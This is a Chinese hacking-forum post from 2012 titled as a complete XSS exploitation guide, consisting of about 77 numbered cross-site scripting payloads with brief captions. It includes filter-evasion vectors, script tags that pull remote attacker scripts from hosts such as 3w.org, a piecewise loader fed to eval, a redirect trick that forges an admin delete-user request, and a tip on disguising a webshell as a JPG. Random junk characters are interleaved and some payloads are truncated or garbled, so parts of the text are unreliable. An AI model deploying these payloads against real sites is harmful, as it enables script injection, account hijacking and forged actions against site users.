找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2114|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
跨站图片shell
. D* `4 b! K2 l* k- \4 _0 LXSS跨站代码  <script>alert("")</script>
  ]/ q1 c  O" v) H' i  t; b# @8 S- Z. N# o
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
: X/ z7 M/ d0 \7 `* l
# h7 T# c! k" x0 p* ]+ O$ X& e  J/ I. f& n! _  |

; r+ L9 v% [$ R8 o1)普通的XSS JavaScript注入0 T; g) L% @" R2 a
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% x# p+ m% X) R  }; _" r

: H2 A" E# E) b$ ^(2)IMG标签XSS使用JavaScript命令
- S# `4 m7 D6 Q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 i' F* l1 k9 L* ~2 r) U
' c% w9 ]4 n+ z! V2 L5 _
(3)IMG标签无分号无引号
) {0 O# G' P1 U$ ^0 ~* `3 u<IMG SRC=javascript:alert(‘XSS’)>% K6 [: q6 w( d4 y
/ Q" k& l/ r+ m/ }
(4)IMG标签大小写不敏感
. b; F: ^  E, ]! `<IMG SRC=JaVaScRiPt:alert(‘XSS’)># ~, u5 O% n, w/ w8 V( ~# [/ {2 z4 C

% n) Q3 p3 z* g) i# {  J4 r(5)HTML编码(必须有分号)
- p% e3 Y9 A) ?' R4 |, j<IMG SRC=javascript:alert(“XSS”)>
2 E" R$ o& G* {2 z9 w/ D
8 [7 x% f) s! @(6)修正缺陷IMG标签
0 ]$ b! Q6 }* ^<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
. o. O" G2 K' b2 E! Y
4 i( f* x' z. E3 W! ^4 K4 J(7)formCharCode标签(计算器)8 x# E$ y7 g- |$ [; g+ |2 d0 G' e
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 W' @, p  ^& K+ B# e3 v7 Q: N" B$ R/ p- w3 L7 C
(8)UTF-8的Unicode编码(计算器)
4 {' x+ [, ~; i( A. F  J6 G<IMG SRC=jav..省略..S')>; T$ p, l2 \) y3 U

6 A/ i& }! O8 j6 N6 y1 M(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
" I6 Z/ [+ @6 p<IMG SRC=jav..省略..S')>
* n+ ?/ j0 w1 \
( |) x- _/ W( z5 z# }(10)十六进制编码也是没有分号(计算器)
- y- t, i& J( a7 I" q<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>  S& S& H5 y3 K* j
& b; F/ j& }  Y) \- I9 k0 }5 j
(11)嵌入式标签,将Javascript分开
$ I1 d7 K! I2 k2 W0 m) D: f& o<IMG SRC=”jav ascript:alert(‘XSS’);”>
* I& ?8 |1 [, }: T/ k; W4 {0 C/ x$ M  e/ G$ k' ]- L
(12)嵌入式编码标签,将Javascript分开
5 G# I8 y# g6 l<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 q% N( X& K) @6 k$ S0 P  N
8 C1 J- Z/ d% M) o(13)嵌入式换行符
2 ]. M7 k4 t1 d. P9 D. m- h& r6 }  Z6 ^<IMG SRC=”jav ascript:alert(‘XSS’);”>
* f5 g) F; j+ C2 V  W7 J+ t6 O" u8 {2 t
(14)嵌入式回车0 W, G' B) y6 Z7 t2 O2 n
<IMG SRC=”jav ascript:alert(‘XSS’);”>, F7 \  G% F5 [0 l7 L

& V' G8 Y" H6 _0 P' ?6 v* F; m(15)嵌入式多行注入JavaScript,这是XSS极端的例子
* O6 U  B9 ^) S! t) {<IMG SRC=”javascript:alert(‘XSS‘)”>' W5 P' S' v5 Z- e
- U* N- p* c" ^9 F$ A; {. s
(16)解决限制字符(要求同页面)% z/ h. j* @3 W7 `' z+ T! f
<script>z=’document.’</script>$ w$ O8 l+ n- |( s8 p# H9 [
<script>z=z+’write(“‘</script>4 Q/ d2 ~% ^' ~* E# z( o
<script>z=z+’<script’</script>
# x' ]9 z! ~/ e# p$ D<script>z=z+’ src=ht’</script>
$ K8 b0 e$ h- i! T3 m9 o1 ?6 O<script>z=z+’tp://ww’</script>
' r% Z0 C1 G# z- j, M! q<script>z=z+’w.shell’</script>
% S2 U: g4 B0 ^<script>z=z+’.net/1.’</script>2 N- T4 b8 D0 Y: j
<script>z=z+’js></sc’</script>
8 T) F6 N8 n) F' G) o6 e<script>z=z+’ript>”)’</script>1 @, \1 ?8 C3 Y' H& K
<script>eval_r(z)</script>
$ \8 J: v9 W5 E9 I& G+ a/ y( j. L' P1 \) [; O2 z+ R% P
(17)空字符
% J- K5 i  }2 y! f2 m# Dperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
7 ^7 c+ b2 f3 Q
, {, T- U, }, S; E# g3 T(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
* w; J% m6 a# P0 c, h1 gperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out% G- q1 Z$ A( _2 ?

4 D0 Y1 F- a" V" s0 `- m+ f(19)Spaces和meta前的IMG标签, [4 Z# y" O! @5 _9 X5 x* w6 l
<IMG SRC=” javascript:alert(‘XSS’);”>
. C( x* ^2 M. @( s% q
) T, z) d: j/ }" K' l. e, T(20)Non-alpha-non-digit XSS
$ C. f% G+ q  ]  N1 E  h- H<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( i6 h( o1 K# x
3 `& y% a& z3 |, g* H(21)Non-alpha-non-digit XSS to 2
. H6 }: j- W0 Y) N  b( R<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
, p+ R' @" E  D0 n) g# |- d4 y* j3 A  ^5 _" G0 L! I
(22)Non-alpha-non-digit XSS to 3
1 c3 Y3 e0 o7 \+ O8 o. Z$ ^; Y<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 v/ O5 ]9 k0 n+ ^" L

) L1 {( B: o  k(23)双开括号/ Y0 c/ r' e% p
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ V* o4 S7 y) Q% b' y: T0 w* l. d0 T0 h, \8 ?! ~) S. g
(24)无结束脚本标记(仅火狐等浏览器)4 l% o( T1 B' d, @4 T$ T# ^. D) A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>( I2 ^) E4 O) y& ?) A+ c% B8 G
, m. }8 O6 I& L/ t; ]( j5 r
(25)无结束脚本标记22 J- A: D4 n7 z. @
<SCRIPT SRC=//3w.org/XSS/xss.js>
2 ]2 `& P' v0 |5 R# J
, c! }6 |" c- L# ~# j5 [+ C(26)半开的HTML/JavaScript XSS
$ f1 w2 g3 r5 h% h<IMG SRC=”javascript:alert(‘XSS’)”6 z6 O! L$ s! o5 ]& |( P3 |: a  R

1 Z$ G# ~) k, m8 P7 U/ h8 b1 T# i(27)双开角括号% s. ~) f: L  |7 @
<iframe src=http://3w.org/XSS.html <* O- k3 D/ K% p6 u; _
7 a" J, y7 k$ E  g& \
(28)无单引号 双引号 分号
' F' M6 M" Q; V6 v- P! ]& {<SCRIPT>a=/XSS/
  ^% p' b# e. y! t( Palert(a.source)</SCRIPT>
( v, Z+ q: ], X2 `
+ g6 b  _. O! H(29)换码过滤的JavaScript' X6 C) q5 L" U& [' z4 s* M
\”;alert(‘XSS’);//8 d. {7 n8 o6 r( c. X9 o
) s; g( ^' k7 U; a4 l' U
(30)结束Title标签
; R; X7 ?0 l- [0 I: b</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 b9 r  k" {$ L: B( `/ [
. l! C) ^! F) E( P. _- }(31)Input Image
8 p; z$ ?8 N! D<INPUT SRC=”javascript:alert(‘XSS’);”>
9 P3 l. b1 s  Q  d8 m0 @1 m3 g3 m5 S
(32)BODY Image
' Q/ I; H" n- G* N" Q<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, @: q# P0 h7 _9 {9 Z% _

+ {+ l: D& g" y9 g& o7 u(33)BODY标签7 e$ ~8 U( W- V: ], H
<BODY(‘XSS’)>1 m! y) E8 M* r2 Q. o+ m5 D1 Q# m

5 M" d# J' C/ X( H1 k6 d(34)IMG Dynsrc
! y8 X: V7 g/ F* x' Y) i- N: m- y<IMG DYNSRC=”javascript:alert(‘XSS’)”>
& Y* {- R$ a7 k, b) j3 s; D9 u$ I* c+ B6 p& b, L1 \
(35)IMG Lowsrc
( c9 x  c6 [$ j2 [9 v; Q5 L* Z. m- I<IMG LOWSRC=”javascript:alert(‘XSS’)”>
% }6 n; T' H4 v+ X0 }& }  P3 p; X$ [+ p& k5 ~! b0 R
(36)BGSOUND% |& n9 M  A5 i8 D
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 ^# O6 G! }/ [0 N: Y! f+ m0 f& |( `- A* A3 [# l+ y9 O
(37)STYLE sheet9 g: s* w5 ~) o: ~4 z  f% |3 p& N
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
; `8 y: k/ _+ n7 |, a
7 O% S& f1 a* u$ M(38)远程样式表: R( ?1 D' n$ j) g4 ?
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 u2 V$ R* a, \' n! r4 B% G1 g

2 D) e" a. h/ Q# ~' p# I(39)List-style-image(列表式)
6 t8 h. h$ J4 {/ `<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS, ^+ A1 F5 Z, \( l

: H! I: o( r& ?  {& \8 ?(40)IMG VBscript; @: o' V* d/ P* I( c4 s$ L/ n5 h
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
) q' U$ C7 \+ ?7 N" l
. x6 u$ X9 x# ](41)META链接url0 h( Y' I) V' Y$ \5 z
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>3 z. F$ M$ B! |" w
$ D' D  v: b% r; W" k
(42)Iframe; K% }  ]- _3 |) L$ ^9 q
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 s* ?5 u& l- k- |. _9 s- A(43)Frame1 ^3 W+ \% F% M
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>: |( m7 ^5 T- f% ?: I

. ^1 A& j% W: D. `' i1 V(44)Table
5 l% b, R& W" M& O" D( j<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
2 |( O; j5 u" Y' x: B% B0 G3 H9 }4 X: t# q. B1 A1 |
(45)TD6 A6 T9 L9 w1 c7 t( s) N
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 r' J4 e! \, C  O0 h

/ @0 @& Z  @0 P7 J# Q/ q" d(46)DIV background-image
" G/ x6 C6 M) o<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
0 d' n. u( R% `* h0 }5 N8 u" |1 ]5 b( x3 ^% u4 w5 J0 H
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
1 F5 Z, J- Z8 F; _' U. s<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
& C2 q2 L0 H1 L9 c9 K2 o3 F; b3 S
(48)DIV expression; y$ k- `+ q* y
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>2 I& |& z5 \* M4 s
% Z) r$ F9 b8 v" |/ T; g6 H+ ]. b
(49)STYLE属性分拆表达
/ E( y: }6 O$ u. O- `3 z# L<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
1 v& Y6 S% ^( C, z& r; ]2 z2 w3 f: l* e" [
(50)匿名STYLE(组成:开角号和一个字母开头)3 O- f+ H4 n/ Y, y5 g- C
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>) n: W+ U# b- B( [

  U, Z) @3 h8 j, n+ r# f8 K$ q(51)STYLE background-image! f5 q6 w7 I5 N* {) s
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>$ _* d1 Y$ \+ W4 ^7 d6 P3 I

* R) ^  q2 d  a. K! k0 U9 _(52)IMG STYLE方式
& g% n& }. h" x- Wexppression(alert(“XSS”))’>& p4 L* Y; Y1 }  a3 ]3 P
6 J& G( `, ~  t, m* j& s# W# x
(53)STYLE background1 l( H, s; D: O+ J8 z
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* l# {/ G8 x5 ^4 z: Z, \0 w( b" N$ @4 T: h: U
(54)BASE+ Y  s& k( I* I# @, ^
<BASE HREF=”javascript:alert(‘XSS’);//”>
  c- p8 v  H6 E9 ?: ?
' z4 D9 n; D4 T) q( C: {(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. T9 {3 _5 q' i; U9 I+ K
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
; H3 G1 l! W0 w# d% O! j5 u, d) U, Z  ^+ y, ~, b* }3 f& i2 v) u
(56)在flash中使用ActionScrpt可以混进你XSS的代码# k# N0 b# Q4 }' A
a=”get”;, @# M# ~# k! k2 I
b=”URL(\”";; r; P/ F3 d2 N6 {) I# u% Q
c=”javascript:”;3 M( k8 V0 o" y& f7 z( M1 G8 ]
d=”alert(‘XSS’);\”)”;& ]6 ~" }, C1 [' D  Y
eval_r(a+b+c+d);1 e+ z. z( w3 o9 V6 {- @
4 F7 ]5 ]6 Y2 T6 h
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上9 y( ]" i5 q# x5 r( O- m' t. L6 j
<HTML xmlns:xss>
7 K0 c1 e# `1 m" l<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>! t* W" o! Y  b  ]0 W  U: o" r9 W
<xss:xss>XSS</xss:xss>
$ [+ r! w* F+ g4 o</HTML>& i& d$ H" [6 E/ d  Z
1 I3 m0 H  s0 `
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用/ k, q5 i1 G7 m$ e( A
<SCRIPT SRC=””></SCRIPT>
* ]8 g; u  M+ P. `' J: {+ ]+ i6 Z
) n' E9 z% o6 i: W6 J  y(59)IMG嵌入式命令,可执行任意命令# U$ L9 s2 Z! W# B, `- [) m
<IMG SRC=”http://www.XXX.com/a.php?a=b”>9 @' a/ r' i- s) [7 [. Q
) T* }2 t$ `' B
(60)IMG嵌入式命令(a.jpg在同服务器)
# i8 y- a" {6 SRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
; d1 A; r! t( U  h% G) s2 M4 q' S1 h" P8 r5 o2 O6 N5 [
(61)绕符号过滤
/ Y; K9 \1 l' g  E2 H<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* H# z( p4 Q/ z+ y& f4 J6 J$ n# @- ?% ^
(62)
7 V0 N! }% V! I6 N) }$ m6 }+ n<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
" E# E5 E  e6 J/ X: V# {4 J3 f
3 [) y# y( \) s# |(63)
# p. C/ o7 |5 h& c<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 w( I( Z5 U+ e/ e9 T
7 z& M7 V. B6 l, K# a7 W(64)
1 T- S3 i9 n- E: R- a& ^<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>' m/ m8 m% q% _3 ]* Z1 H/ f

+ S! ^: E9 |# H; K, i(65)! c4 v# d2 i% A3 e: A6 x
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>6 c5 _" U" j( z  y' u6 n

$ C0 f7 g2 m6 b+ W- Z/ V' _! t(66)
: `! K! c2 D; n% u/ s3 ^$ Y<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>! E+ P" s# Z! y4 t3 g

: {( w7 u# T+ y/ F5 v* s4 `(67)/ x& n! @+ d6 ]
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>9 I' H% R* ]9 m' c
7 H. U/ u3 J7 {; O  M' W' Q
(68)URL绕行0 y! M$ y) s$ e7 g) C# b
<A HREF=”http://127.0.0.1/”>XSS</A>
' Z  r5 p9 ?9 q' D' Y7 N, b4 {
2 o% p! P0 x( @- o# H(69)URL编码" r6 J3 B: |! P# C* t
<A HREF=”http://3w.org”>XSS</A>
0 j: n; b0 }. y2 M8 R  V+ Z  l
- y" f, ~8 m. \$ @) c(70)IP十进制! N5 \$ r7 C/ j& v* d3 b( v
<A HREF=”http://3232235521″>XSS</A>  l5 H6 s) _9 n2 M& `
+ U' T" T, T: c8 F
(71)IP十六进制& f9 t  L; ^( w9 N; ~! h
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>/ d' u, d: L# H5 s6 }
6 |7 d$ w5 z9 f
(72)IP八进制
0 ?% s4 Q3 i8 o<A HREF=”http://0300.0250.0000.0001″>XSS</A>
$ M3 y5 T, |% {% o- H# ^7 H6 g( }/ ]& R+ t% r' @2 F
(73)混合编码
  q/ y+ R9 C/ e; o6 t" r) I<A HREF=”h
5 E2 J" Q* v! w# i3 ^tt p://6 6.000146.0×7.147/”">XSS</A>5 i! i0 s! D+ V: R
0 J/ A+ u8 m# f) |* ^
(74)节省[http:]( R+ R4 h8 `( N& m+ ^
<A HREF=”//www.google.com/”>XSS</A>
9 l' c0 L4 w# [) Z
$ S9 A2 i4 Z! I9 c4 S(75)节省[www]
& t( x$ o4 O# E& C2 C3 i4 E<A HREF=”http://google.com/”>XSS</A>4 L* C% U' i; b/ S
. |/ P& l5 j0 _$ v( h
(76)绝对点绝对DNS8 i, {5 X* h( R1 s
<A HREF=”http://www.google.com./”>XSS</A>
9 w' X9 {/ Z% A: j; t9 e
: R% Y4 ~6 J9 L6 X. ](77)javascript链接
4 h& w# [1 g  ~<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>) m0 U7 T4 a, I: ?! G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表